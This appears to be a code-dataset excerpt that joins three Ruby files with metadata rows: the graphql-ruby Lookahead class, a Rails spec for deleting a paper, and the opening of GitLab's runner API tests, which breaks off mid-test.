# @param field [GraphQL::Schema::Field] if `ast_nodes` are fields, this is the field definition matching those nodes
# @param root_type [Class] if `ast_nodes` are operation definition, this is the root type for that operation
def initialize(query:, ast_nodes:, field: nil, root_type: nil, owner_type: nil)
  @query = query
  @ast_nodes = ast_nodes.freeze
  @field = field
  @root_type = root_type
  @owner_type = owner_type
  # The type whose fields any subsequent selections are looked up on.
  @selected_type = field ? field.type.unwrap : root_type
end
# The AST nodes this lookahead is based on (frozen in #initialize).
# @return [Array<GraphQL::Language::Nodes::Field>]
attr_reader :ast_nodes
# The field definition shared by {#ast_nodes}; nil at an operation root.
# @return [GraphQL::Schema::Field]
attr_reader :field
# The type which {#field} was selected on.
# @return [GraphQL::Schema::Object, GraphQL::Schema::Union, GraphQL::Schema::Interface]
attr_reader :owner_type
# Coerced keyword arguments of this lookahead's field, memoized.
# Returns nil when there is no field (e.g. at the operation root).
# NOTE: `||=` re-evaluates on every call while @field is nil — harmless,
# since the result is nil in that case anyway.
# @return [Hash<Symbol, Object>]
def arguments
  @arguments ||= @field && ArgumentHelpers.arguments(@query, @field, ast_nodes.first)
end
# True if this node has a selection on `field_name`.
# If `field_name` is a String, it is treated as a GraphQL-style (camelized)
# field name and used verbatim. If `field_name` is a Symbol, it is
# treated as a Ruby-style (underscored) name and camelized before comparing.
#
# If `arguments:` is provided, each provided key/value must be present and
# matching in the next selection; extra arguments in the selection are fine.
# @param field_name [String, Symbol]
# @param arguments [Hash] Arguments which must match in the selection
# @return [Boolean]
def selects?(field_name, arguments: nil)
  next_lookahead = selection(field_name, arguments: arguments)
  next_lookahead.selected?
end
# @return [Boolean] True if this lookahead represents a field that was requested
# (the null object {NullLookahead} overrides this to return false).
def selected?
  true
end
# Like {#selects?}, but can be used for chaining.
# It returns a null object (check with {#selected?})
# @return [GraphQL::Execution::Lookahead]
def selection(field_name, selected_type: @selected_type, arguments: nil)
  next_field_name = normalize_name(field_name)
  next_field_defn = FieldHelpers.get_field(@query.schema, selected_type, next_field_name)
  if next_field_defn
    # Gather every AST node (across this lookahead's nodes and their
    # fragments) that selects the field and satisfies `arguments`.
    next_nodes = []
    @ast_nodes.each do |ast_node|
      ast_node.selections.each do |selection|
        find_selected_nodes(selection, next_field_name, next_field_defn, arguments: arguments, matches: next_nodes)
      end
    end
    if next_nodes.any?
      Lookahead.new(query: @query, ast_nodes: next_nodes, field: next_field_defn, owner_type: selected_type)
    else
      # The field exists on the type but wasn't selected (or arguments didn't match).
      NULL_LOOKAHEAD
    end
  else
    # No such field on `selected_type`.
    NULL_LOOKAHEAD
  end
end
# Like {#selection}, but for all nodes.
# It returns a list of Lookaheads for all Selections
#
# If `arguments:` is provided, each provided key/value will be matched
# against the arguments in each selection. This method will filter the selections
# if any of the given `arguments:` do not match the given selection.
#
# @example getting the name of a selection
#   def articles(lookahead:)
#     next_lookaheads = lookahead.selections # => [#<GraphQL::Execution::Lookahead ...>, ...]
#     next_lookaheads.map(&:name) #=> [:full_content, :title]
#   end
#
# @param arguments [Hash] Arguments which must match in the selection
# @return [Array<GraphQL::Execution::Lookahead>]
def selections(arguments: nil)
  subselections_by_type = {}
  subselections_on_type = subselections_by_type[@selected_type] = {}
  @ast_nodes.each do |node|
    find_selections(subselections_by_type, subselections_on_type, @selected_type, node.selections, arguments)
  end
  subselections = []
  # Build one Lookahead per (type, response key) group collected above.
  subselections_by_type.each do |type, ast_nodes_by_response_key|
    ast_nodes_by_response_key.each do |response_key, ast_nodes|
      field_defn = FieldHelpers.get_field(@query.schema, type, ast_nodes.first.name)
      lookahead = Lookahead.new(query: @query, ast_nodes: ast_nodes, field: field_defn, owner_type: type)
      subselections.push(lookahead)
    end
  end
  subselections
end
# The Ruby-side method name (underscored `method_sym`) of this
# lookahead's field, or nil when there is no field.
#
# @example getting the name of a selection
#   def articles(lookahead:)
#     article.selection(:full_content).name # => :full_content
#     # ...
#   end
#
# @return [Symbol]
def name
  @field&.original_name
end
def inspect
"#<GraphQL::Execution::Lookahead #{@field ? "@field=#{@field.path.inspect}": "@root_type=#{@root_type}"} @ast_nodes.size=#{@ast_nodes.size}>"
end
# This is returned for {Lookahead#selection} when a non-existent field is passed.
# Null object: every query method reports "nothing selected".
class NullLookahead < Lookahead
  # No inputs required here.
  # (Intentionally skips Lookahead#initialize — a null lookahead carries no state.)
  def initialize
  end
  def selected?
    false
  end
  def selects?(*)
    false
  end
  # Chaining off a miss keeps returning the singleton miss.
  def selection(*)
    NULL_LOOKAHEAD
  end
  def selections(*)
    []
  end
  def inspect
    "#<GraphQL::Execution::Lookahead::NullLookahead>"
  end
end
# A singleton, so that misses don't come with overhead.
NULL_LOOKAHEAD = NullLookahead.new
private
# Symbols are treated as Ruby-style names and camelized to the GraphQL
# convention; strings are used verbatim.
def normalize_name(name)
  name.is_a?(Symbol) ? Schema::Member::BuildType.camelize(name.to_s) : name
end
# GraphQL-style String keywords are underscored into Ruby symbols;
# symbols are assumed to already be Ruby-style and pass through.
def normalize_keyword(keyword)
  keyword.is_a?(String) ? Schema::Member::BuildType.underscore(keyword).to_sym : keyword
end
# True when any directive on `ast_selection` (e.g. @skip / @include)
# excludes the node for the current query context.
def skipped_by_directive?(ast_selection)
  ast_selection.directives.each do |directive|
    dir_defn = @query.schema.directives.fetch(directive.name)
    directive_class = dir_defn.type_class
    if directive_class
      # Coerce the directive's own arguments before asking it whether
      # the node should be statically included.
      dir_args = GraphQL::Execution::Lookahead::ArgumentHelpers.arguments(@query, dir_defn, directive)
      return true unless directive_class.static_include?(dir_args, @query.context)
    end
  end
  false
end
# Walks `ast_selections` (fields, inline fragments, fragment spreads),
# grouping field nodes by response key into `selections_on_type`, and by
# concrete type into `subselections_by_type` when a fragment narrows the
# type. When `arguments` is present, fields whose coerced arguments don't
# match are filtered out.
def find_selections(subselections_by_type, selections_on_type, selected_type, ast_selections, arguments)
  ast_selections.each do |ast_selection|
    # Runtime directives (@skip/@include) may drop this node entirely.
    next if skipped_by_directive?(ast_selection)
    case ast_selection
    when GraphQL::Language::Nodes::Field
      response_key = ast_selection.alias || ast_selection.name
      if selections_on_type.key?(response_key)
        # Duplicate selection of the same response key: merge the nodes.
        selections_on_type[response_key] << ast_selection
      elsif arguments.nil? || arguments.empty?
        selections_on_type[response_key] = [ast_selection]
      else
        field_defn = FieldHelpers.get_field(@query.schema, selected_type, ast_selection.name)
        if arguments_match?(arguments, field_defn, ast_selection)
          selections_on_type[response_key] = [ast_selection]
        end
      end
    when GraphQL::Language::Nodes::InlineFragment
      on_type = selected_type
      subselections_on_type = selections_on_type
      if (t = ast_selection.type)
        # Assuming this is valid, that `t` will be found.
        on_type = @query.schema.get_type(t.name).type_class
        subselections_on_type = subselections_by_type[on_type] ||= {}
      end
      find_selections(subselections_by_type, subselections_on_type, on_type, ast_selection.selections, arguments)
    when GraphQL::Language::Nodes::FragmentSpread
      frag_defn = @query.fragments[ast_selection.name] || raise("Invariant: Can't look ahead to nonexistent fragment #{ast_selection.name} (found: #{@query.fragments.keys})")
      # Again, assuming a valid AST
      on_type = @query.schema.get_type(frag_defn.type.name).type_class
      subselections_on_type = subselections_by_type[on_type] ||= {}
      find_selections(subselections_by_type, subselections_on_type, on_type, frag_defn.selections, arguments)
    else
      raise "Invariant: Unexpected selection type: #{ast_selection.class}"
    end
  end
end
# If a selection on `node` matches `field_name` (which is backed by `field_defn`)
# and matches the `arguments:` constraints, then add that node to `matches`.
# Inline fragments and fragment spreads are traversed recursively.
def find_selected_nodes(node, field_name, field_defn, arguments:, matches:)
  # Nodes excluded by @skip/@include never match.
  return if skipped_by_directive?(node)
  case node
  when GraphQL::Language::Nodes::Field
    if node.name == field_name
      if arguments.nil? || arguments.empty?
        # No constraint applied
        matches << node
      elsif arguments_match?(arguments, field_defn, node)
        matches << node
      end
    end
  when GraphQL::Language::Nodes::InlineFragment
    node.selections.each { |s| find_selected_nodes(s, field_name, field_defn, arguments: arguments, matches: matches) }
  when GraphQL::Language::Nodes::FragmentSpread
    frag_defn = @query.fragments[node.name] || raise("Invariant: Can't look ahead to nonexistent fragment #{node.name} (found: #{@query.fragments.keys})")
    frag_defn.selections.each { |s| find_selected_nodes(s, field_name, field_defn, arguments: arguments, matches: matches) }
  else
    raise "Unexpected selection comparison on #{node.class.name} (#{node})"
  end
end
# True when every key/value in `arguments` is present (after keyword
# normalization) and equal among the coerced arguments of `field_node`.
# The node may carry additional arguments beyond the given constraints.
def arguments_match?(arguments, field_defn, field_node)
  query_kwargs = ArgumentHelpers.arguments(@query, field_defn, field_node)
  arguments.all? do |arg_name, arg_value|
    arg_name = normalize_keyword(arg_name)
    # Make sure the constraint is present with a matching value
    query_kwargs.key?(arg_name) && query_kwargs[arg_name] == arg_value
  end
end
# TODO Dedup with interpreter
# Helpers for coercing AST argument values into Ruby keyword hashes.
module ArgumentHelpers
  module_function

  # Builds a keyword Hash for the arguments of `ast_node`, using the
  # argument definitions of `arg_owner` (a field, directive, or input
  # object type). Arguments the client omitted fall back to their schema
  # default values.
  def arguments(query, arg_owner, ast_node)
    kwarg_arguments = {}
    arg_defns = arg_owner.arguments
    ast_node.arguments.each do |arg|
      arg_defn = arg_defns[arg.name] || raise("Invariant: missing argument definition for #{arg.name.inspect} in #{arg_defns.keys} from #{arg_owner}")
      # Need to distinguish between client-provided `nil`
      # and nothing-at-all
      is_present, value = arg_to_value(query, arg_defn.type, arg.value)
      kwarg_arguments[arg_defn.keyword] = value if is_present
    end
    # Fill in schema defaults for anything the client didn't send.
    arg_defns.each_value do |arg_defn|
      if arg_defn.default_value? && !kwarg_arguments.key?(arg_defn.keyword)
        kwarg_arguments[arg_defn.keyword] = arg_defn.default_value
      end
    end
    kwarg_arguments
  end

  # Get a Ruby-ready value from a client query.
  # @param query [GraphQL::Query]
  # @param arg_type [Class, GraphQL::Schema::NonNull, GraphQL::Schema::List]
  # @param ast_value [GraphQL::Language::Nodes::VariableIdentifier, String, Integer, Float, Boolean]
  # @return [Array(is_present, value)]
  def arg_to_value(query, arg_type, ast_value)
    if ast_value.is_a?(GraphQL::Language::Nodes::VariableIdentifier)
      # If it's not here, it will get added later
      if query.variables.key?(ast_value.name)
        return true, query.variables[ast_value.name]
      else
        return false, nil
      end
    elsif ast_value.is_a?(GraphQL::Language::Nodes::NullValue)
      return true, nil
    elsif arg_type.is_a?(GraphQL::Schema::NonNull)
      arg_to_value(query, arg_type.of_type, ast_value)
    elsif arg_type.is_a?(GraphQL::Schema::List)
      # Treat a single value like a list
      list = []
      Array(ast_value).each do |inner_v|
        _present, value = arg_to_value(query, arg_type.of_type, inner_v)
        list << value
      end
      return true, list
    elsif arg_type.is_a?(Class) && arg_type < GraphQL::Schema::InputObject
      # Bug fix: `arguments` takes (query, arg_owner, ast_node); the
      # original passed an extra leading `nil` owner, which raised
      # ArgumentError for every input-object argument.
      args = arguments(query, arg_type, ast_value)
      # For these, `prepare` is applied during `#initialize`.
      # We're not tracking defaults_used, but for our purposes
      # we compare the value to the default value.
      return true, arg_type.new(ruby_kwargs: args, context: query.context, defaults_used: nil)
    else
      flat_value = flatten_ast_value(query, ast_value)
      return true, arg_type.coerce_input(flat_value, query.context)
    end
  end

  # Recursively converts AST value nodes (enums, input objects, lists,
  # variable references) into plain Ruby values.
  def flatten_ast_value(query, v)
    case v
    when GraphQL::Language::Nodes::Enum
      v.name
    when GraphQL::Language::Nodes::InputObject
      v.arguments.each_with_object({}) do |arg, h|
        h[arg.name] = flatten_ast_value(query, arg.value)
      end
    when Array
      v.map { |v2| flatten_ast_value(query, v2) }
    when GraphQL::Language::Nodes::VariableIdentifier
      # Bug fix: the recursive call dropped the required `query` first
      # argument (flatten_ast_value takes two parameters).
      flatten_ast_value(query, query.variables[v.name])
    else
      v
    end
  end
end
# TODO dedup with interpreter
# Helper for resolving field definitions, including introspection fields.
module FieldHelpers
  module_function

  # Looks up `field_name` on `owner_type`, falling back to the schema's
  # introspection entry points (only valid on the query root) and then
  # to dynamic introspection fields. Returns nil when nothing matches.
  def get_field(schema, owner_type, field_name)
    owner_type.get_field(field_name) ||
      if owner_type == schema.query.type_class && (entry_point_field = schema.introspection_system.entry_point(name: field_name))
        entry_point_field.type_class
      elsif (dynamic_field = schema.introspection_system.dynamic_field(name: field_name))
        dynamic_field.type_class
      end
  end
end
end
end
end
| 40.46056 | 180 | 0.628388 |
38a770d8e2fc0a8a455fe200c9045bc7b3492ae5 | 286 | require 'rails_helper'
# Feature spec: deleting a paper from its show page removes the record.
describe 'Destroy paper action', type: :feature do
  let(:paper) { FactoryBot.create :paper }
  # The show page renders the 'Delete paper' link exercised below.
  before { visit paper_path(paper) }
  it 'removes the paper from the database' do
    expect { click_link 'Delete paper' }.to change(Paper, :count).by(-1)
  end
end
d57993ab454003d545328765b749aeeffb3d0ab8 | 54,726 | require 'spec_helper'
describe API::Runner, :clean_gitlab_redis_shared_state do
include StubGitlabCalls
include RedisHelpers
let(:registration_token) { 'abcdefg123456' }
before do
stub_feature_flags(ci_enable_live_trace: true)
stub_gitlab_calls
stub_application_setting(runners_registration_token: registration_token)
allow_any_instance_of(Ci::Runner).to receive(:cache_attributes)
end
describe '/api/v4/runners' do
describe 'POST /api/v4/runners' do
context 'when no token is provided' do
it 'returns 400 error' do
post api('/runners')
expect(response).to have_gitlab_http_status 400
end
end
context 'when invalid token is provided' do
it 'returns 403 error' do
post api('/runners'), token: 'invalid'
expect(response).to have_gitlab_http_status 403
end
end
context 'when valid token is provided' do
it 'creates runner with default values' do
post api('/runners'), token: registration_token
runner = Ci::Runner.first
expect(response).to have_gitlab_http_status 201
expect(json_response['id']).to eq(runner.id)
expect(json_response['token']).to eq(runner.token)
expect(runner.run_untagged).to be true
expect(runner.active).to be true
expect(runner.token).not_to eq(registration_token)
expect(runner).to be_instance_type
end
context 'when project token is used' do
let(:project) { create(:project) }
it 'creates project runner' do
post api('/runners'), token: project.runners_token
expect(response).to have_gitlab_http_status 201
expect(project.runners.size).to eq(1)
runner = Ci::Runner.first
expect(runner.token).not_to eq(registration_token)
expect(runner.token).not_to eq(project.runners_token)
expect(runner).to be_project_type
end
end
context 'when group token is used' do
let(:group) { create(:group) }
it 'creates a group runner' do
post api('/runners'), token: group.runners_token
expect(response).to have_http_status 201
expect(group.runners.size).to eq(1)
runner = Ci::Runner.first
expect(runner.token).not_to eq(registration_token)
expect(runner.token).not_to eq(group.runners_token)
expect(runner).to be_group_type
end
end
end
context 'when runner description is provided' do
it 'creates runner' do
post api('/runners'), token: registration_token,
description: 'server.hostname'
expect(response).to have_gitlab_http_status 201
expect(Ci::Runner.first.description).to eq('server.hostname')
end
end
context 'when runner tags are provided' do
it 'creates runner' do
post api('/runners'), token: registration_token,
tag_list: 'tag1, tag2'
expect(response).to have_gitlab_http_status 201
expect(Ci::Runner.first.tag_list.sort).to eq(%w(tag1 tag2))
end
end
context 'when option for running untagged jobs is provided' do
context 'when tags are provided' do
it 'creates runner' do
post api('/runners'), token: registration_token,
run_untagged: false,
tag_list: ['tag']
expect(response).to have_gitlab_http_status 201
expect(Ci::Runner.first.run_untagged).to be false
expect(Ci::Runner.first.tag_list.sort).to eq(['tag'])
end
end
context 'when tags are not provided' do
it 'returns 400 error' do
post api('/runners'), token: registration_token,
run_untagged: false
expect(response).to have_gitlab_http_status 400
expect(json_response['message']).to include(
'tags_list' => ['can not be empty when runner is not allowed to pick untagged jobs'])
end
end
end
context 'when option for locking Runner is provided' do
it 'creates runner' do
post api('/runners'), token: registration_token,
locked: true
expect(response).to have_gitlab_http_status 201
expect(Ci::Runner.first.locked).to be true
end
end
context 'when option for activating a Runner is provided' do
context 'when active is set to true' do
it 'creates runner' do
post api('/runners'), token: registration_token,
active: true
expect(response).to have_gitlab_http_status 201
expect(Ci::Runner.first.active).to be true
end
end
context 'when active is set to false' do
it 'creates runner' do
post api('/runners'), token: registration_token,
active: false
expect(response).to have_gitlab_http_status 201
expect(Ci::Runner.first.active).to be false
end
end
end
context 'when maximum job timeout is specified' do
it 'creates runner' do
post api('/runners'), token: registration_token,
maximum_timeout: 9000
expect(response).to have_gitlab_http_status 201
expect(Ci::Runner.first.maximum_timeout).to eq(9000)
end
context 'when maximum job timeout is empty' do
it 'creates runner' do
post api('/runners'), token: registration_token,
maximum_timeout: ''
expect(response).to have_gitlab_http_status 201
expect(Ci::Runner.first.maximum_timeout).to be_nil
end
end
end
%w(name version revision platform architecture).each do |param|
context "when info parameter '#{param}' info is present" do
let(:value) { "#{param}_value" }
it "updates provided Runner's parameter" do
post api('/runners'), token: registration_token,
info: { param => value }
expect(response).to have_gitlab_http_status 201
expect(Ci::Runner.first.read_attribute(param.to_sym)).to eq(value)
end
end
end
it "sets the runner's ip_address" do
post api('/runners'),
{ token: registration_token },
{ 'REMOTE_ADDR' => '123.111.123.111' }
expect(response).to have_gitlab_http_status 201
expect(Ci::Runner.first.ip_address).to eq('123.111.123.111')
end
end
# Runner de-registration endpoint (authenticated by the runner token).
describe 'DELETE /api/v4/runners' do
  context 'when no token is provided' do
    it 'returns 400 error' do
      delete api('/runners')
      expect(response).to have_gitlab_http_status 400
    end
  end
  context 'when invalid token is provided' do
    it 'returns 403 error' do
      delete api('/runners'), token: 'invalid'
      expect(response).to have_gitlab_http_status 403
    end
  end
  context 'when valid token is provided' do
    let(:runner) { create(:ci_runner) }
    it 'deletes Runner' do
      delete api('/runners'), token: runner.token
      expect(response).to have_gitlab_http_status 204
      expect(Ci::Runner.count).to eq(0)
    end
    # Shared examples asserting the endpoint honors 412 preconditions.
    it_behaves_like '412 response' do
      let(:request) { api('/runners') }
      let(:params) { { token: runner.token } }
    end
  end
end
# Runner credential verification endpoint.
describe 'POST /api/v4/runners/verify' do
  let(:runner) { create(:ci_runner) }
  context 'when no token is provided' do
    it 'returns 400 error' do
      post api('/runners/verify')
      expect(response).to have_gitlab_http_status :bad_request
    end
  end
  context 'when invalid token is provided' do
    it 'returns 403 error' do
      post api('/runners/verify'), token: 'invalid-token'
      expect(response).to have_gitlab_http_status 403
    end
  end
  context 'when valid token is provided' do
    it 'verifies Runner credentials' do
      post api('/runners/verify'), token: runner.token
      expect(response).to have_gitlab_http_status 200
    end
  end
end
end
describe '/api/v4/jobs' do
let(:project) { create(:project, shared_runners_enabled: false) }
let(:pipeline) { create(:ci_pipeline_without_jobs, project: project, ref: 'master') }
let(:runner) { create(:ci_runner, :project, projects: [project]) }
let(:job) do
create(:ci_build, :artifacts, :extended_options,
pipeline: pipeline, name: 'spinach', stage: 'test', stage_idx: 0, commands: "ls\ndate")
end
describe 'POST /api/v4/jobs/request' do
let!(:last_update) {}
let!(:new_update) { }
let(:user_agent) { 'gitlab-runner 9.0.0 (9-0-stable; go1.7.4; linux/amd64)' }
before do
job
stub_container_registry_config(enabled: false)
end
shared_examples 'no jobs available' do
before do
request_job
end
context 'when runner sends version in User-Agent' do
context 'for stable version' do
it 'gives 204 and set X-GitLab-Last-Update' do
expect(response).to have_gitlab_http_status(204)
expect(response.header).to have_key('X-GitLab-Last-Update')
end
end
context 'when last_update is up-to-date' do
let(:last_update) { runner.ensure_runner_queue_value }
it 'gives 204 and set the same X-GitLab-Last-Update' do
expect(response).to have_gitlab_http_status(204)
expect(response.header['X-GitLab-Last-Update']).to eq(last_update)
end
end
context 'when last_update is outdated' do
let(:last_update) { runner.ensure_runner_queue_value }
let(:new_update) { runner.tick_runner_queue }
it 'gives 204 and set a new X-GitLab-Last-Update' do
expect(response).to have_gitlab_http_status(204)
expect(response.header['X-GitLab-Last-Update']).to eq(new_update)
end
end
context 'when beta version is sent' do
let(:user_agent) { 'gitlab-runner 9.0.0~beta.167.g2b2bacc (master; go1.7.4; linux/amd64)' }
it { expect(response).to have_gitlab_http_status(204) }
end
context 'when pre-9-0 version is sent' do
let(:user_agent) { 'gitlab-ci-multi-runner 1.6.0 (1-6-stable; go1.6.3; linux/amd64)' }
it { expect(response).to have_gitlab_http_status(204) }
end
context 'when pre-9-0 beta version is sent' do
let(:user_agent) { 'gitlab-ci-multi-runner 1.6.0~beta.167.g2b2bacc (master; go1.6.3; linux/amd64)' }
it { expect(response).to have_gitlab_http_status(204) }
end
end
end
context 'when no token is provided' do
it 'returns 400 error' do
post api('/jobs/request')
expect(response).to have_gitlab_http_status 400
end
end
context 'when invalid token is provided' do
it 'returns 403 error' do
post api('/jobs/request'), token: 'invalid'
expect(response).to have_gitlab_http_status 403
end
end
context 'when valid token is provided' do
context 'when Runner is not active' do
let(:runner) { create(:ci_runner, :inactive) }
let(:update_value) { runner.ensure_runner_queue_value }
it 'returns 204 error' do
request_job
expect(response).to have_gitlab_http_status(204)
expect(response.header['X-GitLab-Last-Update']).to eq(update_value)
end
end
context 'when jobs are finished' do
before do
job.success
end
it_behaves_like 'no jobs available'
end
context 'when other projects have pending jobs' do
before do
job.success
create(:ci_build, :pending)
end
it_behaves_like 'no jobs available'
end
context 'when shared runner requests job for project without shared_runners_enabled' do
let(:runner) { create(:ci_runner, :instance) }
it_behaves_like 'no jobs available'
end
context 'when there is a pending job' do
let(:expected_job_info) do
{ 'name' => job.name,
'stage' => job.stage,
'project_id' => job.project.id,
'project_name' => job.project.name }
end
let(:expected_git_info) do
{ 'repo_url' => job.repo_url,
'ref' => job.ref,
'sha' => job.sha,
'before_sha' => job.before_sha,
'ref_type' => 'branch' }
end
let(:expected_steps) do
[{ 'name' => 'script',
'script' => %w(ls date),
'timeout' => job.metadata_timeout,
'when' => 'on_success',
'allow_failure' => false },
{ 'name' => 'after_script',
'script' => %w(ls date),
'timeout' => job.metadata_timeout,
'when' => 'always',
'allow_failure' => true }]
end
let(:expected_variables) do
[{ 'key' => 'CI_JOB_NAME', 'value' => 'spinach', 'public' => true },
{ 'key' => 'CI_JOB_STAGE', 'value' => 'test', 'public' => true },
{ 'key' => 'DB_NAME', 'value' => 'postgres', 'public' => true }]
end
let(:expected_artifacts) do
[{ 'name' => 'artifacts_file',
'untracked' => false,
'paths' => %w(out/),
'when' => 'always',
'expire_in' => '7d' }]
end
let(:expected_cache) do
[{ 'key' => 'cache_key',
'untracked' => false,
'paths' => ['vendor/*'],
'policy' => 'pull-push' }]
end
let(:expected_features) { { 'trace_sections' => true } }
it 'picks a job' do
request_job info: { platform: :darwin }
expect(response).to have_gitlab_http_status(201)
expect(response.headers).not_to have_key('X-GitLab-Last-Update')
expect(runner.reload.platform).to eq('darwin')
expect(json_response['id']).to eq(job.id)
expect(json_response['token']).to eq(job.token)
expect(json_response['job_info']).to eq(expected_job_info)
expect(json_response['git_info']).to eq(expected_git_info)
expect(json_response['image']).to eq({ 'name' => 'ruby:2.1', 'entrypoint' => '/bin/sh' })
expect(json_response['services']).to eq([{ 'name' => 'postgres', 'entrypoint' => nil,
'alias' => nil, 'command' => nil },
{ 'name' => 'docker:stable-dind', 'entrypoint' => '/bin/sh',
'alias' => 'docker', 'command' => 'sleep 30' }])
expect(json_response['steps']).to eq(expected_steps)
expect(json_response['artifacts']).to eq(expected_artifacts)
expect(json_response['cache']).to eq(expected_cache)
expect(json_response['variables']).to include(*expected_variables)
expect(json_response['features']).to eq(expected_features)
end
context 'when job is made for tag' do
let!(:job) { create(:ci_build, :tag, pipeline: pipeline, name: 'spinach', stage: 'test', stage_idx: 0) }
it 'sets branch as ref_type' do
request_job
expect(response).to have_gitlab_http_status(201)
expect(json_response['git_info']['ref_type']).to eq('tag')
end
end
context 'when job is made for branch' do
it 'sets tag as ref_type' do
request_job
expect(response).to have_gitlab_http_status(201)
expect(json_response['git_info']['ref_type']).to eq('branch')
end
end
it 'updates runner info' do
expect { request_job }.to change { runner.reload.contacted_at }
end
%w(version revision platform architecture).each do |param|
context "when info parameter '#{param}' is present" do
let(:value) { "#{param}_value" }
it "updates provided Runner's parameter" do
request_job info: { param => value }
expect(response).to have_gitlab_http_status(201)
expect(runner.reload.read_attribute(param.to_sym)).to eq(value)
end
end
end
it "sets the runner's ip_address" do
post api('/jobs/request'),
{ token: runner.token },
{ 'User-Agent' => user_agent, 'REMOTE_ADDR' => '123.222.123.222' }
expect(response).to have_gitlab_http_status 201
expect(runner.reload.ip_address).to eq('123.222.123.222')
end
context 'when concurrently updating a job' do
before do
expect_any_instance_of(Ci::Build).to receive(:run!)
.and_raise(ActiveRecord::StaleObjectError.new(nil, nil))
end
it 'returns a conflict' do
request_job
expect(response).to have_gitlab_http_status(409)
expect(response.headers).not_to have_key('X-GitLab-Last-Update')
end
end
context 'when project and pipeline have multiple jobs' do
let!(:job) { create(:ci_build, :tag, pipeline: pipeline, name: 'spinach', stage: 'test', stage_idx: 0) }
let!(:job2) { create(:ci_build, :tag, pipeline: pipeline, name: 'rubocop', stage: 'test', stage_idx: 0) }
let!(:test_job) { create(:ci_build, pipeline: pipeline, name: 'deploy', stage: 'deploy', stage_idx: 1) }
before do
job.success
job2.success
end
it 'returns dependent jobs' do
request_job
expect(response).to have_gitlab_http_status(201)
expect(json_response['id']).to eq(test_job.id)
expect(json_response['dependencies'].count).to eq(2)
expect(json_response['dependencies']).to include(
{ 'id' => job.id, 'name' => job.name, 'token' => job.token },
{ 'id' => job2.id, 'name' => job2.name, 'token' => job2.token })
end
end
context 'when pipeline have jobs with artifacts' do
let!(:job) { create(:ci_build, :tag, :artifacts, pipeline: pipeline, name: 'spinach', stage: 'test', stage_idx: 0) }
let!(:test_job) { create(:ci_build, pipeline: pipeline, name: 'deploy', stage: 'deploy', stage_idx: 1) }
before do
job.success
end
it 'returns dependent jobs' do
request_job
expect(response).to have_gitlab_http_status(201)
expect(json_response['id']).to eq(test_job.id)
expect(json_response['dependencies'].count).to eq(1)
expect(json_response['dependencies']).to include(
{ 'id' => job.id, 'name' => job.name, 'token' => job.token,
'artifacts_file' => { 'filename' => 'ci_build_artifacts.zip', 'size' => 106365 } })
end
end
context 'when explicit dependencies are defined' do
let!(:job) { create(:ci_build, :tag, pipeline: pipeline, name: 'spinach', stage: 'test', stage_idx: 0) }
let!(:job2) { create(:ci_build, :tag, pipeline: pipeline, name: 'rubocop', stage: 'test', stage_idx: 0) }
let!(:test_job) do
create(:ci_build, pipeline: pipeline, token: 'test-job-token', name: 'deploy',
stage: 'deploy', stage_idx: 1,
options: { dependencies: [job2.name] })
end
before do
job.success
job2.success
end
it 'returns dependent jobs' do
request_job
expect(response).to have_gitlab_http_status(201)
expect(json_response['id']).to eq(test_job.id)
expect(json_response['dependencies'].count).to eq(1)
expect(json_response['dependencies'][0]).to include('id' => job2.id, 'name' => job2.name, 'token' => job2.token)
end
end
context 'when dependencies is an empty array' do
let!(:job) { create(:ci_build, :tag, pipeline: pipeline, name: 'spinach', stage: 'test', stage_idx: 0) }
let!(:job2) { create(:ci_build, :tag, pipeline: pipeline, name: 'rubocop', stage: 'test', stage_idx: 0) }
let!(:empty_dependencies_job) do
create(:ci_build, pipeline: pipeline, token: 'test-job-token', name: 'empty_dependencies_job',
stage: 'deploy', stage_idx: 1,
options: { dependencies: [] })
end
before do
job.success
job2.success
end
it 'returns an empty array' do
request_job
expect(response).to have_gitlab_http_status(201)
expect(json_response['id']).to eq(empty_dependencies_job.id)
expect(json_response['dependencies'].count).to eq(0)
end
end
context 'when job has no tags' do
before do
job.update(tags: [])
end
context 'when runner is allowed to pick untagged jobs' do
before do
runner.update_column(:run_untagged, true)
end
it 'picks job' do
request_job
expect(response).to have_gitlab_http_status 201
end
end
context 'when runner is not allowed to pick untagged jobs' do
before do
runner.update_column(:run_untagged, false)
end
it_behaves_like 'no jobs available'
end
end
context 'when triggered job is available' do
let(:expected_variables) do
[{ 'key' => 'CI_JOB_NAME', 'value' => 'spinach', 'public' => true },
{ 'key' => 'CI_JOB_STAGE', 'value' => 'test', 'public' => true },
{ 'key' => 'CI_PIPELINE_TRIGGERED', 'value' => 'true', 'public' => true },
{ 'key' => 'DB_NAME', 'value' => 'postgres', 'public' => true },
{ 'key' => 'SECRET_KEY', 'value' => 'secret_value', 'public' => false },
{ 'key' => 'TRIGGER_KEY_1', 'value' => 'TRIGGER_VALUE_1', 'public' => false }]
end
let(:trigger) { create(:ci_trigger, project: project) }
let!(:trigger_request) { create(:ci_trigger_request, pipeline: pipeline, builds: [job], trigger: trigger) }
before do
project.variables << Ci::Variable.new(key: 'SECRET_KEY', value: 'secret_value')
end
shared_examples 'expected variables behavior' do
it 'returns variables for triggers' do
request_job
expect(response).to have_gitlab_http_status(201)
expect(json_response['variables']).to include(*expected_variables)
end
end
context 'when variables are stored in trigger_request' do
before do
trigger_request.update_attribute(:variables, { TRIGGER_KEY_1: 'TRIGGER_VALUE_1' } )
end
it_behaves_like 'expected variables behavior'
end
context 'when variables are stored in pipeline_variables' do
before do
create(:ci_pipeline_variable, pipeline: pipeline, key: :TRIGGER_KEY_1, value: 'TRIGGER_VALUE_1')
end
it_behaves_like 'expected variables behavior'
end
end
describe 'registry credentials support' do
let(:registry_url) { 'registry.example.com:5005' }
let(:registry_credentials) do
{ 'type' => 'registry',
'url' => registry_url,
'username' => 'gitlab-ci-token',
'password' => job.token }
end
context 'when registry is enabled' do
before do
stub_container_registry_config(enabled: true, host_port: registry_url)
end
it 'sends registry credentials key' do
request_job
expect(json_response).to have_key('credentials')
expect(json_response['credentials']).to include(registry_credentials)
end
end
context 'when registry is disabled' do
before do
stub_container_registry_config(enabled: false, host_port: registry_url)
end
it 'does not send registry credentials' do
request_job
expect(json_response).to have_key('credentials')
expect(json_response['credentials']).not_to include(registry_credentials)
end
end
end
describe 'timeout support' do
context 'when project specifies job timeout' do
let(:project) { create(:project, shared_runners_enabled: false, build_timeout: 1234) }
it 'contains info about timeout taken from project' do
request_job
expect(response).to have_gitlab_http_status(201)
expect(json_response['runner_info']).to include({ 'timeout' => 1234 })
end
context 'when runner specifies lower timeout' do
